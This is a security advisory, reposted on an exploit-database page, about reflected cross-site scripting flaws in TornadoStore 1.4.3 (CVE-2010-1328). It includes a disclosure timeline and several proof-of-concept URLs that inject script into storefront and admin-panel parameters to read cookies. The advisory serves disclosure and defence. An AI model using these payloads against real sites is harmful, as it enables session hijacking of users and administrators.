0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

TornadoStore 1.4.3 XSS Vulnerability

Author

Bonsai

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

====================================
TornadoStore 1.4.3 XSS Vulnerability
====================================


1. *Advisory Information*

Title: Multiple XSS in TornadoStore 1.4.3
Advisory ID: BONSAI-2010-0107
Advisory URL:
http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php
Date published: 2010-06-29
Vendors contacted: TornadoStore
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-1328 


3. *Software Description*

TornadoStoreÑ‚Ð”Ð² is an ecommerce platform. The objective is to solve integrally
the commercialization of products and services of companies using an online 
payment system. [0].


4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which 
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web 
application to send malicious code, generally in the form of a browser side 
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it. 

For additional information, please read [1].


5. *Vulnerable packages*

Version <= 1.4.3


6. *Non-vulnerable packages*

TornadoStore developers informed us that all users should upgrade to the latest 
version of TornadoStore, which fixes this vulnerability. More information to be 
found here:
    http://www.tornadostore.com


7. *Credits*

This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).


8. *Technical Description*

8.1 A Reflected Cross Site Scripting vulnerability was found in the 
"tipo" and "destino" variables within the 'Services' section
and "rubro", "arti" on 'Products' section.
This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the 
following URL:

http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3

http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>

http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL

http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>

8.2 A Reflected Cross Site Scripting vulnerability was found in the
TornadoStore Administration Panel. In "descrip" and "tit" variables
within the 'e-Commerce' Section. This could lead to admin session hijacking.

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="

http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>


9. *Report Timeline*

    - 2010-02-02:
    Vulnerabilities were identified.

    - 2010-02-08:
    Vendor confirmed these vulnerabilities.

    - 2010-02-16:
    Vendor contacted for an approximate fix release date. No specific answer given.

    - 2010-03-10:
    Vendor fixed these vulnerabilities. No specific answer given.

    - 2010-04-12:
    Vendor fixed this issue.

    - 2010-05-29:
    The advisory BONSAI-2010-0107 is published.




#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

TornadoStore 1.4.3 XSS Vulnerability

Report Error

Report Error